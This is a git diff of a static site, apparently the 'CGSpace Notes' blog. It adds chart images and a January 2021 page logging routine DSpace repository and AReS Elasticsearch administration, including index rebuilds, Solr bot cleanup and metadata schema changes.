+ + +[libjvm.so] (1 samples, 0.08%) + + + +org/hibernate/type/EntityType:::isEntityType (1 samples, 0.08%) + + + +java/lang/Throwable:::fillInStackTrace (1 samples, 0.08%) + + + +sun/reflect/GeneratedMethodAccessor27:::invoke (1 samples, 0.08%) + + + +org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (2 samples, 0.16%) + + + +org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.08%) + + + + diff --git a/docs/2020/03/cgspace-cpu-year.png b/docs/2020/03/cgspace-cpu-year.png new file mode 100644 index 000000000..ea0b09c77 Binary files /dev/null and b/docs/2020/03/cgspace-cpu-year.png differ diff --git a/docs/2020/03/cgspace-heap-year.png b/docs/2020/03/cgspace-heap-year.png new file mode 100644 index 000000000..298984c7a Binary files /dev/null and b/docs/2020/03/cgspace-heap-year.png differ diff --git a/docs/2020/03/cgspace-memory-year.png b/docs/2020/03/cgspace-memory-year.png new file mode 100644 index 000000000..f71ddce2f Binary files /dev/null and b/docs/2020/03/cgspace-memory-year.png differ diff --git a/docs/2020/04/jmx_tomcat_dbpools-day.png b/docs/2020/04/jmx_tomcat_dbpools-day.png new file mode 100644 index 000000000..f6f984356 Binary files /dev/null and b/docs/2020/04/jmx_tomcat_dbpools-day.png differ diff --git a/docs/2020/04/jmx_tomcat_dbpools-month.png b/docs/2020/04/jmx_tomcat_dbpools-month.png new file mode 100644 index 000000000..6b1d8005b Binary files /dev/null and b/docs/2020/04/jmx_tomcat_dbpools-month.png differ diff --git a/docs/2020/04/postgres_connections_cgspace-day.png b/docs/2020/04/postgres_connections_cgspace-day.png new file mode 100644 index 000000000..1106502cf Binary files /dev/null and b/docs/2020/04/postgres_connections_cgspace-day.png differ diff --git a/docs/2020/04/postgres_connections_cgspace-week.png b/docs/2020/04/postgres_connections_cgspace-week.png new file mode 100644 index 000000000..4290c1d54 Binary files /dev/null and b/docs/2020/04/postgres_connections_cgspace-week.png differ diff --git a/docs/2020/05/postgres_connections_cgspace-week.png b/docs/2020/05/postgres_connections_cgspace-week.png new file mode 100644 index 000000000..8f847ed11 Binary files /dev/null and b/docs/2020/05/postgres_connections_cgspace-week.png differ diff --git a/docs/2020/05/postgres_connections_cgspace-week2.png b/docs/2020/05/postgres_connections_cgspace-week2.png new file mode 100644 index 000000000..a9b2abd46 Binary files /dev/null and b/docs/2020/05/postgres_connections_cgspace-week2.png differ diff --git a/docs/2020/06/cgspace-discovery-search.png b/docs/2020/06/cgspace-discovery-search.png new file mode 100644 index 000000000..0e2f0a7ad Binary files /dev/null and b/docs/2020/06/cgspace-discovery-search.png differ diff --git a/docs/2020/06/item-authorizations-dspace58.png b/docs/2020/06/item-authorizations-dspace58.png new file mode 100644 index 000000000..3f92b8018 Binary files /dev/null and b/docs/2020/06/item-authorizations-dspace58.png differ diff --git a/docs/2020/06/item-authorizations-dspace63.png b/docs/2020/06/item-authorizations-dspace63.png new file mode 100644 index 000000000..f02697b66 Binary files /dev/null and b/docs/2020/06/item-authorizations-dspace63.png differ diff --git a/docs/2020/06/localhost-discovery-search.png b/docs/2020/06/localhost-discovery-search.png new file mode 100644 index 000000000..2acfc2fda Binary files /dev/null and b/docs/2020/06/localhost-discovery-search.png differ diff --git a/docs/2020/06/postgres_connections_ALL-day2.png b/docs/2020/06/postgres_connections_ALL-day2.png new file 
mode 100644 index 000000000..7ecf16653 Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-day2.png differ diff --git a/docs/2020/06/postgres_connections_ALL-day3.png b/docs/2020/06/postgres_connections_ALL-day3.png new file mode 100644 index 000000000..aa4e721b5 Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-day3.png differ diff --git a/docs/2020/06/postgres_connections_ALL-week2.png b/docs/2020/06/postgres_connections_ALL-week2.png new file mode 100644 index 000000000..a88f81dba Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-week2.png differ diff --git a/docs/2020/06/postgres_connections_ALL-week3.png b/docs/2020/06/postgres_connections_ALL-week3.png new file mode 100644 index 000000000..f2f2d9829 Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-week3.png differ diff --git a/docs/2020/06/postgres_connections_ALL-year-dspacetest.png b/docs/2020/06/postgres_connections_ALL-year-dspacetest.png new file mode 100644 index 000000000..4e454a575 Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-year-dspacetest.png differ diff --git a/docs/2020/06/postgres_connections_ALL-year.png b/docs/2020/06/postgres_connections_ALL-year.png new file mode 100644 index 000000000..c1ca7574e Binary files /dev/null and b/docs/2020/06/postgres_connections_ALL-year.png differ diff --git a/docs/2020/06/postgres_locks_ALL-week.png b/docs/2020/06/postgres_locks_ALL-week.png new file mode 100644 index 000000000..7237a1ee6 Binary files /dev/null and b/docs/2020/06/postgres_locks_ALL-week.png differ diff --git a/docs/2020/06/postgres_locks_ALL-year.png b/docs/2020/06/postgres_locks_ALL-year.png new file mode 100644 index 000000000..4323ae0d1 Binary files /dev/null and b/docs/2020/06/postgres_locks_ALL-year.png differ diff --git a/docs/2020/07/altmetrics-dimensions-badges.png b/docs/2020/07/altmetrics-dimensions-badges.png new file mode 100644 index 000000000..0420689c3 Binary files /dev/null and b/docs/2020/07/altmetrics-dimensions-badges.png differ diff --git a/docs/2020/07/cua-font-awesome.png b/docs/2020/07/cua-font-awesome.png new file mode 100644 index 000000000..c3eaf3d82 Binary files /dev/null and b/docs/2020/07/cua-font-awesome.png differ diff --git a/docs/2020/07/dimensions-badge.png b/docs/2020/07/dimensions-badge.png new file mode 100644 index 000000000..cd3bcf73e Binary files /dev/null and b/docs/2020/07/dimensions-badge.png differ diff --git a/docs/2020/07/dimensions-badge2.png b/docs/2020/07/dimensions-badge2.png new file mode 100644 index 000000000..84762343b Binary files /dev/null and b/docs/2020/07/dimensions-badge2.png differ diff --git a/docs/2020/07/jmx_dspace_sessions-day.png b/docs/2020/07/jmx_dspace_sessions-day.png new file mode 100644 index 000000000..9218a154e Binary files /dev/null and b/docs/2020/07/jmx_dspace_sessions-day.png differ diff --git a/docs/2020/07/postgres_locks_ALL-day.png b/docs/2020/07/postgres_locks_ALL-day.png new file mode 100644 index 000000000..b2a9fe5f7 Binary files /dev/null and b/docs/2020/07/postgres_locks_ALL-day.png differ diff --git a/docs/2020/07/postgres_transactions_ALL-day.png b/docs/2020/07/postgres_transactions_ALL-day.png new file mode 100644 index 000000000..b20df4108 Binary files /dev/null and b/docs/2020/07/postgres_transactions_ALL-day.png differ diff --git a/docs/2020/07/threads-day.png b/docs/2020/07/threads-day.png new file mode 100644 index 000000000..5f2c384df Binary files /dev/null and b/docs/2020/07/threads-day.png differ diff --git 
a/docs/2020/08/postgres_locks_ALL-day.png b/docs/2020/08/postgres_locks_ALL-day.png new file mode 100644 index 000000000..f29c8b1ee Binary files /dev/null and b/docs/2020/08/postgres_locks_ALL-day.png differ diff --git a/docs/2020/08/postgres_querylength_ALL-day.png b/docs/2020/08/postgres_querylength_ALL-day.png new file mode 100644 index 000000000..2b34e7084 Binary files /dev/null and b/docs/2020/08/postgres_querylength_ALL-day.png differ diff --git a/docs/2020/09/agrovoc-landvoc-sparql.png b/docs/2020/09/agrovoc-landvoc-sparql.png new file mode 100644 index 000000000..c0e4d075a Binary files /dev/null and b/docs/2020/09/agrovoc-landvoc-sparql.png differ diff --git a/docs/2020/09/ares-share-link.png b/docs/2020/09/ares-share-link.png new file mode 100644 index 000000000..4644f6782 Binary files /dev/null and b/docs/2020/09/ares-share-link.png differ diff --git a/docs/2020/09/postgres_connections_ALL-day.png b/docs/2020/09/postgres_connections_ALL-day.png new file mode 100644 index 000000000..5322da280 Binary files /dev/null and b/docs/2020/09/postgres_connections_ALL-day.png differ diff --git a/docs/2020/09/tgn-concept-uri.png b/docs/2020/09/tgn-concept-uri.png new file mode 100644 index 000000000..2278d6205 Binary files /dev/null and b/docs/2020/09/tgn-concept-uri.png differ diff --git a/docs/2020/09/viaf-authority.png b/docs/2020/09/viaf-authority.png new file mode 100644 index 000000000..9c4c61948 Binary files /dev/null and b/docs/2020/09/viaf-authority.png differ diff --git a/docs/2020/09/viaf-darwin.png b/docs/2020/09/viaf-darwin.png new file mode 100644 index 000000000..c7f4eb058 Binary files /dev/null and b/docs/2020/09/viaf-darwin.png differ diff --git a/docs/2020/11/postgres_connections_ALL-week.png b/docs/2020/11/postgres_connections_ALL-week.png new file mode 100644 index 000000000..63f90a4d8 Binary files /dev/null and b/docs/2020/11/postgres_connections_ALL-week.png differ diff --git a/docs/2020/11/postgres_connections_ALL-week2.png b/docs/2020/11/postgres_connections_ALL-week2.png new file mode 100644 index 000000000..7b2bf48a2 Binary files /dev/null and b/docs/2020/11/postgres_connections_ALL-week2.png differ diff --git a/docs/2020/11/postgres_connections_ALL-week3.png b/docs/2020/11/postgres_connections_ALL-week3.png new file mode 100644 index 000000000..021fb5592 Binary files /dev/null and b/docs/2020/11/postgres_connections_ALL-week3.png differ diff --git a/docs/2020/11/postgres_locks_ALL-week.png b/docs/2020/11/postgres_locks_ALL-week.png new file mode 100644 index 000000000..62edfd657 Binary files /dev/null and b/docs/2020/11/postgres_locks_ALL-week.png differ diff --git a/docs/2020/11/postgres_locks_ALL-week2.png b/docs/2020/11/postgres_locks_ALL-week2.png new file mode 100644 index 000000000..08aa4e503 Binary files /dev/null and b/docs/2020/11/postgres_locks_ALL-week2.png differ diff --git a/docs/2020/11/postgres_locks_ALL-week3.png b/docs/2020/11/postgres_locks_ALL-week3.png new file mode 100644 index 000000000..c24739065 Binary files /dev/null and b/docs/2020/11/postgres_locks_ALL-week3.png differ diff --git a/docs/2020/11/postgres_transactions_ALL-week.png b/docs/2020/11/postgres_transactions_ALL-week.png new file mode 100644 index 000000000..d2a5f1e56 Binary files /dev/null and b/docs/2020/11/postgres_transactions_ALL-week.png differ diff --git a/docs/2020/11/postgres_xlog-week.png b/docs/2020/11/postgres_xlog-week.png new file mode 100644 index 000000000..744ea0bdf Binary files /dev/null and b/docs/2020/11/postgres_xlog-week.png differ diff --git 
a/docs/2020/11/postgres_xlog-week2.png b/docs/2020/11/postgres_xlog-week2.png new file mode 100644 index 000000000..32d444212 Binary files /dev/null and b/docs/2020/11/postgres_xlog-week2.png differ diff --git a/docs/2020/12/openrxv-duplicates.png b/docs/2020/12/openrxv-duplicates.png new file mode 100644 index 000000000..daa2ac160 Binary files /dev/null and b/docs/2020/12/openrxv-duplicates.png differ diff --git a/docs/2020/12/postgres_connections_ALL-day.png b/docs/2020/12/postgres_connections_ALL-day.png new file mode 100644 index 000000000..93b95029e Binary files /dev/null and b/docs/2020/12/postgres_connections_ALL-day.png differ diff --git a/docs/2020/12/postgres_connections_ALL-week.png b/docs/2020/12/postgres_connections_ALL-week.png new file mode 100644 index 000000000..42b21e808 Binary files /dev/null and b/docs/2020/12/postgres_connections_ALL-week.png differ diff --git a/docs/2020/12/postgres_connections_ALL-week2.png b/docs/2020/12/postgres_connections_ALL-week2.png new file mode 100644 index 000000000..43e75793a Binary files /dev/null and b/docs/2020/12/postgres_connections_ALL-week2.png differ diff --git a/docs/2020/12/postgres_locks_ALL-day.png b/docs/2020/12/postgres_locks_ALL-day.png new file mode 100644 index 000000000..3c1134031 Binary files /dev/null and b/docs/2020/12/postgres_locks_ALL-day.png differ diff --git a/docs/2020/12/postgres_locks_ALL-week.png b/docs/2020/12/postgres_locks_ALL-week.png new file mode 100644 index 000000000..ffbcfd2ec Binary files /dev/null and b/docs/2020/12/postgres_locks_ALL-week.png differ diff --git a/docs/2020/12/postgres_locks_ALL-week2.png b/docs/2020/12/postgres_locks_ALL-week2.png new file mode 100644 index 000000000..f3e257ca0 Binary files /dev/null and b/docs/2020/12/postgres_locks_ALL-week2.png differ diff --git a/docs/2020/12/postgres_querylength_ALL-day.png b/docs/2020/12/postgres_querylength_ALL-day.png new file mode 100644 index 000000000..3021bbaae Binary files /dev/null and b/docs/2020/12/postgres_querylength_ALL-day.png differ diff --git a/docs/2020/12/postgres_transactions_ALL-day.png b/docs/2020/12/postgres_transactions_ALL-day.png new file mode 100644 index 000000000..df1c77616 Binary files /dev/null and b/docs/2020/12/postgres_transactions_ALL-day.png differ diff --git a/docs/2020/12/solr-statistics-2010-failed.png b/docs/2020/12/solr-statistics-2010-failed.png new file mode 100644 index 000000000..c9454d9e3 Binary files /dev/null and b/docs/2020/12/solr-statistics-2010-failed.png differ diff --git a/docs/2020/12/solr-stats-duplicates.png b/docs/2020/12/solr-stats-duplicates.png new file mode 100644 index 000000000..c10d58fb7 Binary files /dev/null and b/docs/2020/12/solr-stats-duplicates.png differ diff --git a/docs/2021-01/index.html b/docs/2021-01/index.html new file mode 100644 index 000000000..14aeb4e88 --- /dev/null +++ b/docs/2021-01/index.html @@ -0,0 +1,742 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + January, 2021 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

January, 2021

+ +
+

2021-01-03

+
    +
  • Peter notified me that some filters on AReS were broken again +
      +
    • It’s the same issue with the field names getting .keyword appended to the end that I already filed an issue on OpenRXV about last month
    • +
    • I fixed the broken filters (careful to not edit any others, lest they break too!)
    • +
    +
  • +
  • Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV +
      +
    • The start page had been “1” in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API (see the paging sketch after this list)
    • +
    • I adjusted it to default to 0 and added a note to the admin screen
    • +
    • I realized that this issue was actually causing the first page of 100 statistics to be missing…
    • +
    • For example, this item has 51 views on CGSpace, but 0 on AReS
    • +
    +
  • +
+
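For context, a rough sketch of the zero-based paging on both sides (the statistics API host and port below are placeholders):
$ curl -s 'https://cgspace.cgiar.org/rest/items?offset=0&limit=100'
# dspace-statistics-api; host and port are placeholders
$ curl -s 'http://localhost:5000/items?page=0&limit=100'
With the start page defaulting to 1, OpenRXV effectively began at the second page and never saw the first hundred results.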
    +
  • Start a re-index on AReS +
      +
    • First delete the old Elasticsearch temp index:
    • +
    +
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+# start indexing in AReS
+
    +
  • Then, the next morning when it’s done, check the results of the harvesting, backup the current openrxv-items index, and clone the openrxv-items-temp index to openrxv-items:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100278,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-04
+$ curl -XDELETE 'http://localhost:9200/openrxv-items'
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-04'
+

2021-01-04

+
    +
  • There is one item that appears twice in AReS: 10568/66839 + +
  • +
  • Help Peter troubleshoot an issue with Altmetric badges on AReS +
      +
    • He generated a report of our repository from Altmetric and noticed that many were missing scores despite having scores on CGSpace item pages
    • +
    • AReS harvests Altmetric scores using the Handle prefix (10568) in batch, while CGSpace uses the DOI if it is found, and falls back to using the Handle
    • +
    • I think it’s due to the fact that some items were never tweeted, so Altmetric never made the link between the DOI and the Handle
    • +
    • I tweeted five of the items, and within an hour or so the DOI API link registered the associated Handle; within another hour or so the Handle API link was live with the same score (see the API sketch after this list)
    • +
    +
  • +
+
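For reference, the two Altmetric lookups involved look roughly like this (the DOI and Handle below are placeholders, not real items):
$ curl -s 'https://api.altmetric.com/v1/doi/10.xxxx/xxxxx'
$ curl -s 'https://api.altmetric.com/v1/handle/10568/xxxxx'
Once Altmetric has linked a DOI to its Handle, both lookups should return the same attention score.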

2021-01-05

+
    +
  • A user sent me feedback about the dspace-statistics-api +
      +
    • He noticed that the indexer fails if there are unmigrated legacy records in Solr
    • +
    • I added a UUID filter to the queries in the indexer (the idea is sketched after the script example below)
    • +
    +
  • +
  • I generated a CSV of titles and Handles for 2019 and 2020 items for Peter to Tweet +
      +
    • We need to make sure that Altmetric has linked them all with their DOIs
    • +
    • I wrote a quick and dirty script called doi-to-handle.py to read the DOIs from a text file, query the database, and save the handles and titles to a CSV
    • +
    +
  • +
+
$ ./doi-to-handle.py -db dspace -u dspace -p 'fuuu' -i /tmp/dois.txt -o /tmp/out.csv
+
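Coming back to the dspace-statistics-api fix above: the UUID filter simply restricts the Solr queries to documents whose id looks like a UUID, something along these lines (a sketch only; the actual query in the indexer may differ):
# -g stops curl from globbing the {} in the regex; type:2 limits the query to items
$ curl -sg 'http://localhost:8081/solr/statistics/select?q=type:2+AND+id:/.{8}-.{4}-.{4}-.{4}-.{12}/&rows=0'
Unmigrated legacy records still have numeric ids, so the regex excludes them.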
    +
  • Help Udana export IWMI records from AReS +
      +
    • He wanted me to give him CSV export permissions on CGSpace, but I told him that this requires super admin so I’m not comfortable with it
    • +
    +
  • +
  • Import one item to CGSpace for Peter
  • +
+

2021-01-07

+
    +
  • Import twenty CABI book chapters for Abenet
  • +
  • Udana and some editors from IWMI are still having problems editing metadata during the workflow step +
      +
    • It is the same issue Peter reported last month, that values he edits are not saved when the item gets archived
    • +
    • I added myself to the edit and approval steps of the collection on DSpace Test and asked Udana to submit an item there for me to test
    • +
    +
  • +
  • Atmire got back to me about the duplicate data in Solr +
      +
    • They want to arrange a time for us to do the stats processing so they can monitor it
    • +
    • I proposed that I set everything up with a fresh Solr snapshot from CGSpace and then let them start the stats process
    • +
    +
  • +
+

2021-01-10

+ +
2021-01-10 10:03:27,692 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=1e8fb96c-b994-4fe2-8f0c-0a98ab138be0, ObjectType=(Unknown), ObjectID=null, TimeStamp=1610269383279, dispatcher=1544803905, detail=[null], transactionID="TX35636856957739531161091194485578658698")
+
    +
  • I filed a bug on Atmire’s issue tracker
  • +
  • Peter asked me to move the CGIAR Gender Platform community to the top level of CGSpace, but I got an error when I used the community-filiator command:
  • +
+
$ dspace community-filiator --remove --parent=10568/66598 --child=10568/106605
+Loading @mire database changes for module MQM
+Changes have been processed
+Exception: null
+java.lang.UnsupportedOperationException
+        at java.util.AbstractList.remove(AbstractList.java:161)
+        at java.util.AbstractList$Itr.remove(AbstractList.java:374)
+        at java.util.AbstractCollection.remove(AbstractCollection.java:293)
+        at org.dspace.administer.CommunityFiliator.defiliate(CommunityFiliator.java:264)
+        at org.dspace.administer.CommunityFiliator.main(CommunityFiliator.java:164)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • There is apparently a bug in DSpace 6.x that makes community-filiator not work +
      +
    • There is a patch for the as-yet-unreleased DSpace 6.4, so I will try that
    • +
    • I tested the patch on DSpace Test and it worked, so I will do the same on CGSpace tomorrow
    • +
    +
  • +
  • Udana had asked about exporting IWMI’s community on CGSpace, but we don’t want to give him super admin permissions to do that +
      +
    • I suggested that he use AReS, but there are some fields missing because we don’t harvest them all
    • +
    • I added a few more fields to the configuration and will start a fresh harvest.
    • +
    +
  • +
  • Start a re-index on AReS +
      +
    • First delete the old Elasticsearch temp index:
    • +
    +
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+# start indexing in AReS
+... after ten hours
+$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100411,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+
    +
  • Looking over the last month of Solr stats I see a familiar bot that should have been marked as a bot months ago:
  • +
+
+

Mozilla/5.0 (compatible; +centuryb.o.t9[at]gmail.com)

+
+
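A facet query along these lines will surface the top user agents from the last month of statistics (a sketch; field names are from the DSpace statistics schema):
# -g stops curl from globbing the [] in the date range
$ curl -sg 'http://localhost:8081/solr/statistics/select?q=time:[NOW-1MONTH+TO+NOW]&rows=0&facet=true&facet.field=userAgent&facet.limit=20'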
    +
  • There are 51,961 hits from this bot on 64.62.202.71 and 64.62.202.73 +
      +
    • Ah! Actually I added the bot pattern to the Tomcat Crawler Session Manager Valve, which mitigated the abuse of Tomcat sessions:
    • +
    +
  • +
+
$ cat log/dspace.log.2020-12-2* | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=64.62.202.71' | sort | uniq | wc -l
+0
+
    +
  • So now I should really add it to the DSpace spider agent list so it doesn’t create Solr hits +
      +
    • I added it to the “ilri” lists of spider agent patterns
    • +
    +
  • +
  • I purged the existing hits using my check-spider-ip-hits.sh script:
  • +
+
$ ./check-spider-ip-hits.sh -d -f /tmp/ips -s http://localhost:8081/solr -s statistics -p
+
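After purging, a quick count of hits from those two IPs should show that they are gone (same Solr URL as above; ip is a standard field in the statistics schema):
$ curl -s 'http://localhost:8081/solr/statistics/select?q=ip:64.62.202.71+OR+ip:64.62.202.73&rows=0'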

2021-01-11

+
    +
  • The AReS indexing finished this morning and I moved the openrxv-items-temp index to openrxv-items (see above) +
      +
    • I sorted the explorer results by Altmetric attention score and saw a few new ones at the top, so I think the recent tweeting of Handles by Peter and myself worked
    • +
    +
  • +
  • I deployed the community-filiator fix on CGSpace and moved the Gender Platform community to the top level of CGSpace:
  • +
+
$ dspace community-filiator --remove --parent=10568/66598 --child=10568/106605
+

2021-01-12

+
    +
  • IWMI is really pressuring us to have a periodic CSV export of their community +
      +
    • I decided to write a systemd timer that runs dspace metadata-export every week, and added an nginx alias to make the resulting CSV available publicly (a sketch of the export command follows this list)
    • +
    • It is part of the Ansible infrastructure scripts that I use to provision the servers
    • +
    +
  • +
  • I wrote to Atmire to tell them to try their CUA duplicates processor on DSpace Test whenever they get a chance this week +
      +
    • I verified that there were indeed duplicate metadata values in the userAgent_ngram and userAgent_search fields, even in the first few results I saw in Solr
    • +
    • For reference, the UID of the record I saw with duplicate metadata was: 50e52a06-ffb7-4597-8d92-1c608cc71c98
    • +
    +
  • +
+
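    +
  • A minimal sketch of the kind of timer I mean (unit names, paths, and the community handle here are placeholders; the real definitions live in the Ansible templates):
  • +
+
$ cat /etc/systemd/system/dspace-iwmi-export.service
+[Unit]
+Description=Export the IWMI community metadata to CSV
+
+[Service]
+Type=oneshot
+User=dspace
+# 10568/XXXXX is a placeholder for the real IWMI community handle
+ExecStart=/home/dspace/dspace/bin/dspace metadata-export -i 10568/XXXXX -f /var/www/data/iwmi.csv
+
+$ cat /etc/systemd/system/dspace-iwmi-export.timer
+[Unit]
+Description=Run the IWMI CSV export weekly
+
+[Timer]
+OnCalendar=Sun *-*-* 22:00:00
+Persistent=true
+
+[Install]
+WantedBy=timers.target
+$ sudo systemctl enable --now dspace-iwmi-export.timer
+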

2021-01-13

+
    +
  • I filed an issue on cg-core asking about how to handle series name / number +
      +
    • Currently the values are in the format “series name; series number” in the dc.relation.ispartofseries field, but Peter wants to be able to separate them
    • +
    +
  • +
  • Start working on CG Core v2 migration for DSpace 6, using my work from last year on DSpace 5
  • +
+

2021-01-14

+
    +
  • More work on the CG Core v2 migration for DSpace 6
  • +
  • Publish v1.4.1 of the DSpace Statistics API based on feedback from the community +
      +
    • This includes the fix for limiting the Solr query to UUIDs
    • +
    +
  • +
+

2021-01-17

+
    +
  • Start a re-index on AReS +
      +
    • First delete the old Elasticsearch temp index:
    • +
    +
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+# start indexing in AReS
+
    +
  • Then, the next morning when it’s done, check the results of the harvesting, backup the current openrxv-items index, and clone the openrxv-items-temp index to openrxv-items:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100540,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-18
+$ curl -XDELETE 'http://localhost:9200/openrxv-items'
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-18'
+

2021-01-18

+
    +
  • Finish the indexing on AReS that I started yesterday
  • +
  • Udana from IWMI emailed me to ask why the iwmi.csv doesn’t include items he approved to CGSpace this morning +
      +
    • I told him it is generated every Sunday night
    • +
    • I regenerated the file manually for him
    • +
    • I adjusted the script to run on Monday and Friday
    • +
    +
  • +
  • Meeting with Peter and Abenet about CG Core v2 +
      +
    • We also need to remove CTA and CPWF subjects from the input form since they are both closed now and no longer submitting items
    • +
    • Peter also wants to create new fields on CGSpace for the SDGs and CGIAR Impact Areas +
        +
      • I suggested cg.subject.sdg and cg.subject.impactArea
      • +
      +
    • +
    • We also agreed to remove the following fields: +
        +
      • cg.livestock.agegroup
      • +
      • cg.livestock.function
      • +
      • cg.message.sms
      • +
      • cg.message.voice
      • +
      +
    • +
    • I removed them from the input form, metadata registry, and deleted all the values in the database:
    • +
    +
  • +
+
localhost/dspace63= > BEGIN;
+localhost/dspace63= > DELETE FROM metadatavalue WHERE metadata_field_id IN (115, 116, 117, 118);
+DELETE 27
+localhost/dspace63= > COMMIT;
+
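    +
  • For reference, a quick way to double-check which fields those IDs belong to before deleting them, using DSpace’s own registry tables:
  • +
+
$ psql -d dspace63 -c "SELECT mfr.metadata_field_id, msr.short_id, mfr.element, mfr.qualifier FROM metadatafieldregistry mfr JOIN metadataschemaregistry msr ON mfr.metadata_schema_id = msr.metadata_schema_id WHERE mfr.metadata_field_id IN (115, 116, 117, 118);"
+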
    +
  • I submitted an issue to CG Core v2 to propose standardizing the camel case convention for a few more fields of ours
  • +
  • I submitted an issue to CG Core v2 to propose removing cg.series and cg.pages in favor of dcterms.isPartOf and dcterms.extent, respectively
  • +
  • It looks like we will roll all these changes into a CG Core v2.1 release
  • +
+

2021-01-19

+
    +
  • Abenet said that the PDF reports on AReS aren’t working +
      +
    • I had to install unoconv in the backend api container again
    • +
    +
  • +
+
$ docker exec -it api /bin/bash
+# apt update && apt install unoconv
+
    +
  • Help Peter get a list of titles and DOIs for CGSpace items that Altmetric does not have an attention score for +
      +
    • He generated a list from their dashboard and I extracted the DOIs in OpenRefine (because it was WINDOWS-1252 and csvcut couldn’t do it)
    • +
    • Then I looked up the titles and handles using the doi-to-handle.py script that I wrote last week
    • +
    +
  • +
  • I created a pull request to convert several CG Core v2 fields to consistent “camel case” + +
  • +
  • I created a pull request to fix some links in cgcore.html
  • +
+

2021-01-21

+
    +
  • File an issue for the OpenRXV backend API container’s missing unoconv +
      +
    • This causes PDF reports to not work, and I always have to go manually re-install it after rebooting the server
    • +
    +
  • +
  • A little bit more work on the CG Core v2 migration in CGSpace +
      +
    • I updated the migrate-fields.sh script for DSpace 6 and created all the new fields in my test instance
    • +
    +
  • +
+

2021-01-24

+
    +
  • Abenet mentioned that Alan Duncan could not find one of his items on AReS, but it is on CGSpace + +
  • +
  • Import fifteen items to CGSpace for Peter after doing a brief check in OpenRefine and csv-metadata-quality
  • +
  • Ben Hack asked me why I’m still using the default favicon on CGSpace + +
  • +
  • Start a re-index on AReS +
      +
    • First delete the old Elasticsearch temp index:
    • +
    +
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+# start indexing in AReS
+
    +
  • Then, the next morning when it’s done, check the results of the harvesting, backup the current openrxv-items index, and clone the openrxv-items-temp index to openrxv-items:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100699,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write":true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-25
+$ curl -XDELETE 'http://localhost:9200/openrxv-items'
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
